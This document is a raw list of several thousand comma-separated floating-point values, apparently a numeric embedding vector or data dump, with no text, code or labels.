0.0012357454979792237, 0.005413204897195101, -0.02333809807896614, 0.006534215994179249, 0.007587514817714691, 0.026844078674912453, 0.008975612930953503, -0.010367471724748611, 0.021833384409546852, -0.005815715529024601, -0.02461710385978222, 0.0023793273139744997, 0.02478262223303318, -0.017394481226801872, -0.01722896285355091, 0.03337453305721283, -0.001961769536137581, 0.025730591267347336, 0.046886853873729706, -0.030410248786211014, 0.012022656388580799, 0.004100342746824026, 0.012496640905737877, -0.030214635655283928, 0.0018131791148334742, -0.026934361085295677, -0.00717748049646616, -0.01184961386024952, 0.02606162801384926, -0.004897840786725283, 0.04589374363422394, -0.038761403411626816, -0.00394987128674984, -0.017785707488656044, 0.009141131304204464, 0.0009569033863954246, 0.025113658979535103, -0.010104147717356682, 0.008629528805613518, 0.015724249184131622, -0.008005072362720966, 0.00014165461470838636, 0.01391859445720911, -0.021878525614738464, -0.023097343742847443, -0.03316387161612511, -0.01415182463824749, 0.03174944221973419, 0.002890929812565446, 0.001714432262815535, 0.019049664959311485, -0.013083478435873985, 0.01029223669320345, -0.024918045848608017, -0.02184843085706234, 0.018176931887865067, -0.03704603388905525, 0.0020238389261066914, 0.018688535317778587, -0.01403897162526846, -0.011548671871423721, -0.0542900413274765, -0.03683537244796753, -0.021457206457853317, 0.00746337603777647, 0.013068431988358498, -0.0373469740152359, 0.003485291264951229, 0.017906084656715393, -0.0006117598386481404, 0.00014894307241775095, -0.029582656919956207, -0.004664610140025616, -0.019124900922179222, 0.003927300684154034, 0.00006224574462976307, -0.036173298954963684, 0.04261346906423569, -0.01602519303560257, -0.003972442355006933, 0.00533044571056962, 0.025444695726037025, -0.004156769253313541, -0.020539332181215286, -0.016702312976121902, 0.023247813805937767, -0.005484678782522678, -0.014595715329051018, 0.011255253106355667, -0.01659698411822319, 0.011443342082202435, -0.0018677249317988753, 0.006970582529902458, 0.005503487307578325, -0.011706667020916939, 0.009043324738740921, 0.0016843380872160196, 0.006966820918023586, 0.007286572363227606, -0.013557463884353638, -0.027912424877285957, -0.018884146586060524, 0.03861093521118164, 0.028890488669276237, 0.007358046248555183, -0.01856815814971924, 0.010510419495403767, 0.0009235175675712526, -0.010570608079433441, -0.007237669080495834, 0.023879794403910637, 0.014776281081140041, -0.03325415402650833, 0.003359271679073572, -0.008321062661707401, 0.02242022193968296, -0.009720445610582829, 0.013015766628086567, -0.026618370786309242, -0.008170590735971928, -0.02765662409365177, 0.010397566482424736, -0.0067411139607429504, 0.010307283140718937, -0.02409045398235321, -0.012601970694959164, -0.012609493918716908, -0.015498543158173561, -0.02427101880311966, 0.007779365871101618, 0.021126169711351395, 0.02633247710764408, 0.011375629343092442, 0.014106683433055878, 0.000918815319892019, -0.0027874805964529514, -0.014196966774761677, 0.014272201806306839, -0.031087368726730347, -0.003475886769592762, -0.00320691941305995, 0.003979965578764677, -0.005830762442201376, 0.0054094428196549416, -0.015949957072734833, 0.010585655458271503, 0.01469352189451456, -0.034849151968955994, -0.0073843784630298615, -0.006846443749964237, -0.0020370050333440304, -0.000493263709358871, -0.005198783241212368, -0.02807794325053692, 0.00569157674908638, -0.025971345603466034, 0.011571242474019527, 0.010653367266058922, -0.010540514253079891, -0.044810350984334946, 0.01089412160217762, -0.006421362515538931, 0.005176212638616562, -0.0016316730761900544, -0.022104233503341675, -0.006428886204957962, -0.003494695760309696, -0.010788791812956333, -0.013406991958618164, -0.034788962453603745, -0.02229984477162361, -0.008403821848332882, 0.007801936473697424, -0.02093055658042431, 0.020072869956493378, 0.020087918266654015, -0.0007862125057727098, -0.014475338160991669, 0.0184929221868515, -0.01198503840714693, 0.0026426520198583603, 0.011240205727517605, 0.007944884710013866, -0.023127438500523567, 0.021743101999163628, -0.016702312976121902, -0.01913994923233986, 0.004186863545328379, -0.026543136686086655, -0.00616932287812233, -0.008569340221583843, 0.0015837103128433228, -0.007809460163116455, -0.0017341816565021873, -0.03948366641998291, -0.00870476383715868, 0.024632150307297707, 0.009712922386825085, -0.008742381818592548, -0.026076674461364746, -0.021878525614738464, 0.01299319602549076, -0.020358765497803688, -0.010217000730335712, -0.007824507541954517, -0.0009103513439185917, 0.00394987128674984, 0.00899065937846899, 0.0035605269949883223, -0.011074687354266644, 0.006609451491385698, 0.00179437012411654, 0.0012028298806399107, 0.01423458382487297, 0.032471705228090286, 0.007655227091163397, -0.01380574144423008, 0.0028890487737953663, 0.017334293574094772, 0.009231413714587688, 0.014994463883340359, -0.0010006340453401208, 0.03439773619174957, 0.020072869956493378, -0.0013645865255966783, -0.004232005216181278, -0.020900461822748184, -0.01319633238017559, -0.019621456041932106, 0.02052428387105465, -0.0203437190502882, 0.00872733537107706, -0.029868552461266518, 0.0033761996310204268, -0.004822604823857546, -0.006748637650161982, -0.004973076283931732, 0.004156769253313541, -0.01822207309305668, -0.021758148446679115, -0.0030319965444505215, 0.02127664163708687, 0.010743650607764721, 0.024541867896914482, -0.02299201302230358, 0.0034232218749821186, -0.026618370786309242, -0.017304198816418648, 0.011729237623512745, -0.022976966574788094, -0.0008821379742585123, 0.02351866289973259, -0.006097848992794752, -0.012985672801733017, 0.0023360669147223234, 0.021833384409546852, 0.010916692204773426, 0.013467180542647839, -0.019877256825566292, 0.009901011362671852, 0.009509786032140255, 0.022615835070610046, 0.01781580038368702, -0.03319396823644638, 0.0038972063921391964, -0.004547995049506426, 0.040025364607572556, 0.01775561273097992, -0.004845175426453352, -0.010991928167641163, 0.00593609269708395, -0.021291688084602356, 0.003972442355006933, -0.028604593127965927, -0.02172805555164814, 0.01507722306996584, -0.005228877533227205, 0.0058646188117563725, -0.009562450461089611, -0.014685997739434242, 0.012466546148061752, 0.021231498569250107, 0.002343590371310711, -0.021005792543292046, 0.005706623662263155, -0.01230855192989111, 0.012865295633673668, -0.01792113110423088, 0.0029755698051303625, 0.009231413714587688, 0.022916777059435844, 0.00965273380279541, 0.02074999175965786, 0.003675261279568076, 0.00244139670394361, 0.005563675891608, 0.015995098277926445, -0.0017050278838723898, -0.006534215994179249, 0.0017304198117926717, -0.013828312046825886, 0.023563804104924202, -0.0013373135589063168, 0.022119279950857162, 0.02207413874566555, -0.012639588676393032, 0.010939262807369232, -0.005838286131620407, 0.002164905657991767, 0.03162906691431999, 0.01913994923233986, -0.012443975545465946, 0.0002496883098501712, 0.019847163930535316, -0.004085295367985964, -0.02097569778561592, 0.0025279177352786064, -0.019335560500621796, -0.010036434978246689, 0.00411915173754096, 0.008110403083264828, -0.014370008371770382, -0.006722304970026016, -0.023413334041833878, 0.005010694265365601, 0.014580667950212955, -0.01380574144423008, 0.013414516113698483, 0.018869100138545036, -0.0036301198415458202, -0.0021686675027012825, -0.0042620995081961155, 0.01637127622961998, -0.0019561268854886293, 0.03019958920776844, 0.002221332397311926, 0.03719650208950043, -0.00916370190680027, -0.002366160973906517, -0.010028911754488945, 0.00706086540594697, 0.012428929097950459, -0.004623230546712875, 0.007674036081880331, -0.015919862315058708, -0.002958641853183508, -0.01371545810252428, -0.017198868095874786, -0.02553497813642025, 0.007542373612523079, 0.00006112896517151967, 0.006564310286194086, -0.00999881699681282, -0.005898474715650082, 0.0291161946952343, -0.00264453305862844, -0.002042647683992982, 0.00013283794396556914, -0.0020219578873366117, -0.009622639045119286, 0.01682269014418125, -0.0018018936971202493, 0.0002558011910878122, 0.021065980195999146, -0.001522581442259252, 0.0030225920490920544, -0.024587009102106094, -0.0057668122462928295, -0.0002399311779299751, -0.0028044087812304497, -0.0020351242274045944, -0.01423458382487297, 0.02231489308178425, 0.007222622167319059, 0.004284670110791922, -0.009126083925366402, -0.016687266528606415, -0.0055222962982952595, -0.016506701707839966, -0.001917568501085043, -0.006759922951459885, 0.013873453252017498, -0.003265226958319545, 0.002678388962522149, -0.020644661039114, -0.0007297857664525509, 0.03048548474907875, -0.012872818857431412, -0.003139207372441888, 0.01769542321562767, 0.021878525614738464, -0.00102978793438524, -0.008065260946750641, -0.0013523607049137354, 0.02282649464905262, 0.011706667020916939, -0.01146591268479824, -0.018026459962129593, -0.006176846567541361, 0.013188809156417847, 0.02634752355515957, -0.012902913615107536, -0.023834653198719025, 0.003742973320186138, 0.014497908763587475, -0.0003171652788296342, -0.02553497813642025, 0.022570693865418434, -0.013978783041238785, -0.021577583625912666, -0.010803839191794395, 0.00864457618445158, 0.008667146787047386, -0.02455691434442997, -0.01469352189451456, 0.008682193234562874, 0.011684095486998558, -0.019290419295430183, -0.021803289651870728, 0.01388850063085556, 0.022916777059435844, -0.01242140494287014, -0.003758020466193557, 0.012714824639260769, -0.019501078873872757, -0.0014859039802104235, -0.01936565525829792, 0.00028848167858086526, 0.011480960063636303, 0.00789974257349968, -0.012443975545465946, 0.0041642929427325726, -0.015588825568556786, -0.009028277359902859, -0.011518577113747597, -0.0060000428929924965, 0.008163067512214184, -0.009118560701608658, -0.0016429583774879575, 0.013858405873179436, 0.011563719250261784, 0.004822604823857546, -0.0010025149676948786, -0.02264592982828617, 0.0153330247849226, 0.022209562361240387, -0.011533624492585659, -0.016807643696665764, -0.03280274197459221, 0.003161777975037694, -0.0015649014385417104, -0.01677754893898964, 0.0012489117216318846, -0.041590265929698944, -0.0022589503787457943, 0.012398834340274334, 0.0011576885590329766, 0.004927934613078833, 0.017108585685491562, -0.007181242574006319, -0.007726700976490974, 0.01960640959441662, 0.017048398032784462, -0.02708483301103115, -0.018523016944527626, -0.00859191082417965, -0.0044125705026090145, -0.009893487207591534, 0.008509151637554169, -0.016115475445985794, 0.0016871594125404954, 0.027521198615431786, -0.03015444613993168, -0.030184540897607803, -0.0118721853941679, 0.010495373047888279, -0.00616932287812233, -0.005037026479840279, -0.01521264761686325, -0.019982587546110153, 0.018477873876690865, -0.03809932991862297, 0.04508119821548462, -0.024602055549621582, -0.002904095919802785, -0.004472759086638689, 0.01213550940155983, -0.00046998768812045455, 0.0027855997905135155, 0.0055072493851184845, 0.0006032958626747131, -0.005612579174339771, 0.00835868064314127, -0.018477873876690865, -0.004329811315983534, 0.013587557710707188, -0.010510419495403767, -0.008554292842745781, 0.013106049969792366, -0.007038294803351164, -0.007154909893870354, 0.014716092497110367, 0.004570565652102232, -0.014129254035651684, 0.011714190244674683, -0.02023838832974434, -0.011315440759062767, 0.002388731809332967, 0.01121011096984148, -0.009833298623561859, -0.0038595886435359716, 0.0014605119358748198, 0.04300469532608986, -0.005146118346601725, 0.042101867496967316, 0.02536945976316929, 0.010931739583611488, 0.03776829317212105, 0.009991293773055077, -0.012684729881584644, 0.03223095089197159, -0.009306649677455425, -0.004502853378653526, -0.0033272963482886553, -0.013173761777579784, -0.0006742994883097708, 0.003596263937652111, -0.020614566281437874, -0.003799400059506297, 0.006605689879506826, -0.0043862382881343365, 0.011834567412734032, 0.032531894743442535, -0.000052841285651084036, -0.00367338047362864, 0.02369922772049904, 0.03912253677845001, 0.01585967466235161, -0.025911156088113785, 0.008230779320001602, -0.037888672202825546, -0.018402639776468277, -0.031779538840055466, 0.004149246029555798, 0.010931739583611488, 0.01221826858818531, 0.007350522559136152, 0.003645166987553239, 0.0048903170973062515, -0.015001988038420677, -0.0018207026878371835, 0.001220698351971805, 0.03038015402853489, 0.03111746348440647, -0.01993744634091854, 0.0006018851418048143, -0.028168225660920143, -0.010104147717356682, -0.011225158348679543, -0.0011116067180410028, -0.0018978192238137126, -0.013775646686553955, 0.016672220081090927, 0.007576229516416788, 0.00504455016925931, -0.00464203953742981, -0.004721036646515131, -0.04709751531481743, 0.03211057558655739, -0.02339828573167324, -0.004450188484042883, 0.008057737722992897, -0.011052116751670837, -0.03382594510912895, -0.041710641235113144, -0.001769918599165976, -0.0010043958900496364, 0.036113109439611435, 0.014347437769174576, -0.008035167120397091, -0.015302930027246475, -0.024000171571969986, -0.030560718849301338, -0.006428886204957962, 0.006112896371632814, -0.02335314452648163, -0.004487806465476751, -0.018839005380868912, -0.02120140567421913, 0.023157531395554543, -0.01745467074215412, -0.008486581034958363, 0.0018225834937766194, -0.02443653717637062, -0.010736126452684402, 0.016867831349372864, 0.0253544133156538, -0.0168828796595335, 0.002811932237818837, 0.030410248786211014, -0.004833890125155449, -0.007211336866021156, 0.00870476383715868, 0.016416417434811592, 0.017951225861907005, -0.004220719914883375, -0.009442073293030262, -0.003688427619636059, 0.007674036081880331, -0.011548671871423721, 0.02299201302230358, 0.03162906691431999, 0.019455937668681145, 0.0059022363275289536, -0.015468449331820011, 0.0007133279577828944, 0.004886555019766092, 0.02345847524702549, -0.01086402777582407, 0.0035680504515767097, 0.01706344448029995, -0.005537343677133322, -0.015724249184131622, 0.010126718319952488, 0.022781353443861008, -0.001837630639784038, -0.00919379573315382, -0.006188131868839264, -0.007862124592065811, -0.029823409393429756, 0.00021359870152082294, 0.006180608179420233, -0.0013260282576084137, -0.010232048109173775, -0.004405047278851271, 0.008832665160298347, -0.02150234766304493, -0.0016777549171820283, 0.0015404499135911465, 0.007233907468616962, -0.005962424911558628, -0.00188465288374573, 0.007440805435180664, -0.005217592231929302, 0.0010363709880039096, -0.0374673530459404, -0.0048790317960083485, -0.0027536246925592422, 0.005198783241212368, 0.025835920125246048, -0.020027728751301765, -0.012775012291967869, 0.003406293923035264, 0.01775561273097992, 0.009825775399804115, 0.00381256639957428, 0.006203179247677326, 0.03909244015812874, 0.010600702837109566, 0.03256198763847351, -0.01781580038368702, -0.004833890125155449, -0.015423307195305824, -0.01311357319355011, 0.0003797048993874341, -0.00919379573315382, 0.010969357565045357, 0.01314366701990366, 0.004089057445526123, -0.009615115821361542, -0.006353650242090225, -0.017906084656715393, -0.019290419295430183, -0.016175663098692894, 0.000008809330211079214, 0.007854601368308067, -0.0030526863411068916, 0.00358874024823308, 0.004574327263981104, -0.011969991028308868, -0.0012489117216318846, 0.008057737722992897, 0.017274104058742523, -0.016506701707839966, -0.009976246394217014, 0.0009573735878802836, 0.0014388817362487316, 0.006884061731398106, 0.0030075449030846357, -0.02443653717637062, 0.002108478918671608, 0.012684729881584644, -0.0009578438475728035, -0.028905535116791725, 0.02390988916158676, 0.0010119194630533457, 0.0010956190526485443, 0.010548037476837635, 0.010074052959680557, 0.014716092497110367, -0.006594404578208923, -0.016115475445985794, 0.00795240793377161, -0.007771842181682587, -0.013158714398741722, 0.004811319522559643, 0.0016213281778618693, -0.006726066581904888, -0.007166195195168257, 0.021081028506159782, -0.004976837895810604, 0.014986940659582615, -0.0007641120464541018, 0.022691071033477783, 0.0031636590138077736, -0.009720445610582829, 0.01133048813790083, -0.005390633828938007, 0.011247728951275349, 0.006075278390198946, -0.004547995049506426, 0.012082844972610474, 0.01198503840714693, -0.010683462023735046, -0.019335560500621796, 0.010721080005168915, -0.007275287061929703, 0.007474661339074373, 0.028032802045345306, -0.01751485839486122, 0.016702312976121902, 0.0013072193833068013, -0.015235218219459057, -0.0009771229233592749, -0.00928407907485962, -0.0015178791945800185, 0.007200051564723253, 0.004705989733338356, 0.00329155963845551, -0.0015592587878927588, -0.0030000214464962482, 0.01804150827229023, -0.0027517436537891626, -0.015137411653995514, -0.0204039067029953, 0.006579357199370861, 0.0101718595251441, -0.01472361572086811, 0.021111123263835907, -0.000041732273530215025, 0.02311239019036293, 0.0070006768219172955, -0.01822207309305668, 0.028544403612613678, -0.0085618169978261, -0.012684729881584644, -0.0038163282442837954, -0.005996280815452337, 0.0022589503787457943, 0.01787598989903927, -0.0025937489699572325, 0.01895938254892826, 0.004405047278851271, -0.001636375323869288, -0.025234036147594452, -0.008230779320001602, -0.01901957206428051, 0.001769918599165976, 0.012240839190781116, -0.005804430227726698, 0.016672220081090927, -0.0013062788639217615, -0.014685997739434242, -0.0072564780712127686, 0.005157403647899628, -0.0001744526525726542, -0.00007964398537296802, 0.006327318027615547, -0.006308509036898613, -0.024933092296123505, 0.006063993088901043, -0.001367407850921154, 0.014580667950212955, 0.001480261329561472, 0.017048398032784462, 0.014919228851795197, -0.02017820067703724, -0.0021780719980597496, -0.011037069372832775, 0.01149600651115179, 0.023067248985171318, -0.024361303076148033, -0.010766221210360527, 0.007542373612523079, 0.011187540367245674, 0.02362399362027645, -0.004570565652102232, -0.0031354455277323723, -0.025504883378744125, -0.02437634952366352, 0.021577583625912666, 0.00021254070452414453, -0.01596500352025032, 0.011887231841683388, -0.012376263737678528, 0.00864457618445158, -0.0008177174022421241, -0.02028352953493595, 0.027175115421414375, 0.007267763372510672, 0.014678474515676498, 0.023654086515307426, -0.023082295432686806, -0.005356777925044298, -0.018778817728161812, 0.012368740513920784, -0.02639266476035118, 0.012210745364427567, 0.004175578244030476, -0.003018830204382539, 0.003114755731076002, 0.010668414644896984, -0.012767489068210125, 0.01254178211092949, -0.004423855803906918, 0.012383786961436272, -0.017665330320596695, -0.014791328459978104, -0.0018460946157574654, -0.016010144725441933, 0.017484763637185097, 0.000048168447392527014, -0.027445964515209198, -0.0011069044703617692, -0.012443975545465946, -0.023067248985171318, 0.026437805965542793, 0.002430111402645707, 0.014618285931646824, 0.0027084832545369864, 0.0039084916934370995, 0.03129803016781807, -0.007719177287071943, -0.013361850753426552, -0.011939897201955318, -0.019440891221165657, 0.010299759916961193, -0.009178749285638332, 0.016401370987296104, -0.0204039067029953, -0.0007156790816225111, -0.006590642500668764, 0.014023924246430397, -0.017259057611227036, -0.00939693208783865, -0.040898095816373825, 0.002294687321409583, 0.008524199016392231, 0.009976246394217014, 0.006105372682213783, 0.011307917535305023, -0.01891424134373665, -0.013655269518494606, 0.016506701707839966, 0.006564310286194086, 0.01412173081189394, 0.004499091766774654, -0.024571962654590607, 0.016341181471943855, 0.0053981575183570385, -0.009133607149124146, 0.011195064522325993, 0.007395664229989052, -0.015302930027246475, 0.00419438723474741, -0.0011633312096819282, 0.0008576863911002874, 0.03821970894932747, 0.02950742095708847, 0.005838286131620407, -0.008132973685860634, 0.024647198617458344, 0.017093539237976074, -0.009840822778642178, 0.01706344448029995, 0.005969948600977659, 0.017274104058742523, -0.009269031696021557, -0.01706344448029995, 0.006312270648777485, 0.03038015402853489, 0.010818885639309883, 0.002332305070012808, 0.007358046248555183, -0.000022056387024349533, -0.001290291314944625, -0.018763769418001175, -0.017499811947345734, -0.01040508970618248, 0.007425758056342602, 0.0018987596267834306, 0.005341731011867523, -0.020313624292612076, -0.016566889360547066, -0.014701045118272305, -0.022028997540473938, 0.01676250249147415, 0.021351875737309456, 0.011375629343092442, 0.0070119621232151985, -0.004954267293214798, 0.013595080934464931, -0.004378714598715305, 0.0018319879891350865, 0.0204039067029953, -0.023834653198719025, 0.005176212638616562, -0.006120419595390558, 0.004209434613585472, 0.0011934253852814436, 0.0010222643613815308, -0.01683773845434189, -0.004728560335934162, -0.0005732015706598759, 0.004442664794623852, 0.005744241643697023, -0.01388850063085556, 0.005198783241212368, -0.0013721100986003876, -0.015513590537011623, -0.01109725795686245, 0.009427026845514774, 0.01913994923233986, 0.012549305334687233, 0.03186982125043869, 0.019741833209991455, 0.004784987308084965, -0.01918509043753147, -0.01084145624190569, -0.0030056640971451998, 0.013248997740447521, -0.01895938254892826, -0.0050144558772444725, -0.0035360753536224365, 0.040958285331726074, 0.005164927337318659, -0.005556152667850256, 0.011142399162054062, 0.009690350852906704, -0.02028352953493595, -0.01614557020366192, -0.01787598989903927, 0.013956212438642979, 0.013106049969792366, -0.02068980224430561, -0.029612749814987183, 0.014716092497110367, 0.0052476865239441395, 0.011195064522325993, -0.006481551099568605, -0.017951225861907005, -0.027701765298843384, -0.01391859445720911, 0.01965155079960823, 0.01011919416487217, 0.03954385593533516, 0.010435184463858604, 0.0004137960495427251, 0.013662793673574924, -0.009953675791621208, 0.000526649528183043, -0.017078490927815437, -0.011804472655057907, 0.006116657983511686, -0.01832740381360054, 0.0037241645622998476, -0.004265861120074987, 0.01400887779891491, 0.04589374363422394, 0.029176384210586548, -0.024135595187544823, -0.007098483387380838, 0.02357885241508484, -0.008795047178864479, -0.022856589406728745, 0.0008280623587779701, -0.03304349631071091, -0.021592630073428154, 0.011014498770236969, -0.018869100138545036, -0.00035031596780754626, -0.015295406803488731, 0.0008562756702303886, -0.029040958732366562, -0.015633966773748398, -0.03897206485271454, -0.027310539036989212, 0.006981867831200361, 0.012579400092363358, 0.003464601468294859, 0.005146118346601725, 0.004371190909296274, 0.00172571768052876, 0.013655269518494606, -0.024060359224677086, -0.015709202736616135, -0.018643392249941826, -0.016627077013254166, -0.0068163494579494, -0.02178824320435524, 0.014129254035651684, -0.030289871618151665, -0.018823958933353424, 0.007106006611138582, -0.005469631403684616, 0.003842660691589117, 0.014588192105293274, 0.002778076333925128, -0.016265947371721268, 0.004213196225464344, 0.03815951943397522, 0.0033893659710884094, 0.02490299940109253, -0.009344267658889294, -0.0014586311299353838, 0.0010081576183438301, 0.024195784702897072, -0.010239571332931519, -0.026482947170734406, -0.025489836931228638, 0.006865252740681171, 0.025053469464182854, -0.005059597082436085, 0.019335560500621796, -0.021005792543292046, 0.003718521911650896, 0.0006757101509720087, -0.0030225920490920544, -0.02323276735842228, 0.008832665160298347, -0.004818843211978674, -0.015603872947394848, -0.0010156811913475394, -0.005097215063869953, 0.005108500365167856, 0.00439376151189208, -0.003092185128480196, 0.002228856086730957, 0.008554292842745781, -0.02633247710764408, 0.00037829423672519624, 0.007083436008542776, 0.005093453451991081, 0.010961833409965038, 0.01403897162526846, -0.0008642695029266179, 0.0061505138874053955, 0.008953042328357697, 0.004243290517479181, 0.017108585685491562, 0.0014943680725991726, 0.009389408864080906, 0.0005426370771601796, 0.018026459962129593, -0.003462720662355423, -0.006515407003462315, 0.012639588676393032, -0.020012682303786278, -0.0022608311846852303, -0.0004093289317097515, 0.0018818315584212542, -0.0021442158613353968, -0.004243290517479181, -0.00653045391663909, 0.02363904006779194, -0.002533560385927558, -0.030169494450092316, -0.016235852614045143, 0.009374361485242844, 0.0016636481741443276, 0.032080478966236115, 0.0019373178947716951, -0.007561182603240013, -0.002174310153350234, -0.01040508970618248, 0.002544845687225461, 0.009261508472263813, 0.006662116385996342, -0.0012018894776701927, -0.0028138132765889168, 0.014430196955800056, 0.010382519103586674, 0.00008652099495520815, 0.020659709349274635, -0.018884146586060524, 0.023142484948039055, 0.020102964714169502, -0.01936565525829792, -0.013843358494341373, -0.013911071233451366, -0.008448963053524494, 0.0168828796595335, 0.006466503720730543, 0.007388140540570021, -0.013106049969792366, -0.014415149576961994, -0.011375629343092442, 0.00045658633462153375, 0.008531722240149975, 0.016627077013254166, -0.000627277186140418, -0.0027517436537891626, -0.012534258887171745, -0.010074052959680557, -0.0036470480263233185, 0.0028702400159090757, 0.00432228809222579, 0.021306734532117844, 0.006105372682213783, -0.002418826101347804, -0.004973076283931732, 0.0049166493117809296, 0.013933641836047173, -0.0038859210908412933, -0.009532356634736061, 0.008020119741559029, -0.043546393513679504, 0.020855320617556572, -0.014911704696714878, -0.0019100449280813336, 0.005811953451484442, -0.01536311861127615, 0.008509151637554169, -0.01625089906156063, 0.023654086515307426, 0.02433120831847191, 0.0013467180542647839, 0.0038746357895433903, -0.004728560335934162, -0.006677163764834404, -0.021457206457853317, 0.00399125088006258, -0.005458346102386713, -0.00419438723474741, -0.03135821595788002, 0.0017736803274601698, -0.004912887699902058, 0.006425124127417803, 0.009419502690434456, -0.014964370056986809, -0.01060822606086731, -0.013497275300323963, 0.016265947371721268, -0.001020383439026773, 0.010450230911374092, 0.014520479366183281, 0.03493943437933922, 0.004830128513276577, 0.0009559629252180457, -0.01924527809023857, 0.0026031534653156996, -0.0071473862044513226, 0.012082844972610474, -0.0026614610105752945, -0.011601336300373077, -0.0030113067477941513, 0.008193162269890308, -0.012925484217703342, -0.0030526863411068916, 0.012820154428482056, 0.008306015282869339, 0.008599434047937393, -0.016010144725441933, 0.007497231941670179, 0.0017633354291319847, -0.003575574140995741, -0.007959931157529354, -0.0037805913016200066, 0.006188131868839264, -0.0016824571648612618, -0.0010363709880039096, -0.0035605269949883223, 0.025715544819831848, -0.0024583246558904648, -0.022269751876592636, -0.014753710478544235, -0.008659622631967068, -0.02109607495367527, 0.0027178877498954535, -0.012270933948457241, 0.003528551897034049, -0.02178824320435524, -0.021427111700177193, -0.005872142035514116, -0.021713007241487503, 0.03084661439061165, 0.0006531394319608808, 0.00965273380279541, 0.0016062810318544507, -0.011661524884402752, -0.00629722373560071, 0.004021345172077417, -0.024421490728855133, -0.0072602396830916405, 0.013610128313302994, -0.003957394976168871, -0.015453401952981949, -0.014129254035651684, -0.009991293773055077, 0.01319633238017559, 0.0032407755497843027, 0.012368740513920784, -0.012632065452635288, -0.007331713568419218, 0.021081028506159782, 0.010969357565045357, 0.0032577035017311573, 0.004871508106589317, 0.0272653978317976, -0.009923581965267658, -0.017951225861907005, 0.022179467603564262, -0.008245826698839664, 0.006323555950075388, 0.010314807295799255, 0.004988123197108507, -0.011338012292981148, -0.03608301654458046, -0.0016185068525373936, -0.008945518173277378, 0.02115626446902752, -0.00008264165808213875, 0.0037467351648956537, 0.019275372847914696, 0.0014407626586034894, 0.01683773845434189, 0.021592630073428154, 0.009457120671868324, 0.00956997461616993, 0.010066529735922813, -0.024195784702897072, -0.017138680443167686, 0.037557635456323624, -0.010337377898395061, 0.008170590735971928, 0.0025937489699572325, 0.004939220380038023, -0.014392578974366188, 0.008606958203017712, 0.01781580038368702, -0.002475252840667963, -0.008313538506627083, -0.03677518293261528, -0.019034618511795998, 0.0042884317226707935, -0.029296761378645897, 0.006387506145983934, 0.013941165059804916, -0.0034081747289747, -0.035420943051576614, -0.016401370987296104, -0.00015940552111715078, 0.02022334188222885, 0.02386474609375, -0.040145739912986755, 0.013497275300323963, -0.021923666819930077, 0.02178824320435524, 0.006184370256960392, 0.03903225436806679, -0.002264593029394746, 0.009983770549297333, -0.022871635854244232, 0.004818843211978674, -0.0221945159137249, 0.0058909510262310505, 0.0017586331814527512, -0.0007979680667631328, 0.022555647417902946, 0.004111628048121929, -0.014512956142425537, -0.011322964914143085, 0.006432647816836834, 0.010397566482424736, 0.012737395241856575, 0.006759922951459885, 0.0023116152733564377, 0.0018583204364404082, 0.004717275034636259, -0.01891424134373665, 0.01371545810252428, -0.01614557020366192, -0.03653442859649658, 0.024421490728855133, 0.018989477306604385, -0.004201910924166441, 0.005480916704982519, -0.015024558641016483, -0.012775012291967869, 0.015934910625219345, -0.015159983187913895, -0.002811932237818837, -0.015709202736616135, -0.006142990663647652, -0.005364301614463329, -0.020960651338100433, 0.013978783041238785, -0.008885329589247704, 0.0014623928582295775, -0.004694704432040453, -0.010307283140718937, -0.007967455312609673, -0.004600659944117069, 0.0030997085850685835, 0.0014755590818822384, 0.026497995480895042, 0.013173761777579784, 0.0006935786223039031, -0.006410077214241028, 0.016958113759756088, -0.009253984317183495, 0.018312355503439903, -0.004431379493325949, 0.011285346932709217, 0.001984340138733387, 0.014633333310484886, -0.0017765016527846456, 0.002770552644506097, 0.011217635124921799, -0.000014848754290142097, 0.029492372646927834, -0.003229490015655756, 0.005021979566663504, -0.0061392285861074924, 0.014603238552808762, -0.010510419495403767, 0.0030790187884122133, 0.003455196972936392, -0.010848980396986008, 0.014482862316071987, -0.0086220046505332, -0.00928407907485962, -0.013369373977184296, -0.003507862100377679, -0.0017755612498149276, -0.01259444747120142, -0.0039197769947350025, 0.020765038207173347, 0.011744284071028233, 0.008847711607813835, -0.011202587746083736, -0.0009000064455904067, 0.008832665160298347, -0.006575595587491989, 0.009186272509396076, -0.017319245263934135, 0.020087918266654015, 0.0056276265531778336, -0.0034796486143022776, -0.02266097627580166, 0.0008459307719022036, 0.0008581565925851464, 0.013437086716294289, -0.006899108644574881, 0.00021018958068452775, 0.008486581034958363, -0.004450188484042883, 0.008885329589247704, 0.009381884709000587, -0.015084747225046158, -0.004698466043919325, 0.012496640905737877, -0.0031636590138077736, -0.012301027774810791, -0.009020754136145115, -0.004446426872164011, 0.030395200476050377, -0.010796315036714077, 0.0086220046505332, -0.008501628413796425, -0.002533560385927558, -0.03475886955857277, -0.0076288944110274315, 0.01993744634091854, -0.00944959744811058, -0.012752441689372063, -0.007557420525699854, -0.003272750647738576, -0.003015068592503667, 0.010277189314365387, -0.004758654627948999, 0.00924646109342575, 0.025143753737211227, -0.02103588730096817, -0.0035736931022256613, 0.002422587713226676, 0.01029223669320345, 0.009938628412783146, 0.015543684363365173, 0.015498543158173561, 0.014482862316071987, 0.009306649677455425, 0.010623273439705372, -0.0023003299720585346, -0.020328670740127563, 0.014099160209298134, 0.004837652202695608, 0.008825141005218029, 0.012571876868605614, 0.008546769618988037, 0.0049053640104830265, -0.0004638747777789831, 0.005526058375835419, -0.01383583527058363, -0.009585021063685417, -0.014227060601115227, 0.02502337656915188, 0.020494190976023674, 0.0036150726955384016, -0.012180651538074017, -0.003173063276335597, -0.014783804304897785, 0.012850248254835606, -0.028499262407422066, -0.006334841251373291, -0.008223256096243858, 0.009840822778642178, 0.024075407534837723, 0.00859191082417965, 0.010149288922548294, 0.014227060601115227, -0.011834567412734032, 0.030003976076841354, -0.00734676094725728, -0.0006112896371632814, -0.0016984447138383985, 0.008260874077677727, -0.00399125088006258, -0.010480325669050217, -0.0032783932983875275, -0.0003159897169098258, 0.00911103654652834, 0.006060231477022171, -0.0018658440094441175, 0.0006931083626113832, -0.04956524446606636, 0.00009939334267983213, -0.011082210578024387, -0.00024016629322431982, 0.030003976076841354, -0.0034589588176459074, 0.017725517973303795, 0.004457712173461914, 0.0007946765399537981, 0.02398512326180935, -0.005225115455687046, -0.015874721109867096, -0.00818563811480999, -0.01406906545162201, -0.017364386469125748, -0.02178824320435524, -0.0031354455277323723, -0.006331079639494419, 0.0018442138098180294, 0.0059661865234375, 0.02335314452648163, -0.0037279261741787195, -0.025098610669374466, -0.008381251245737076, -0.005996280815452337, 0.007877171970903873, -0.016386324539780617, 0.0011896636569872499, 0.0053718253038823605, 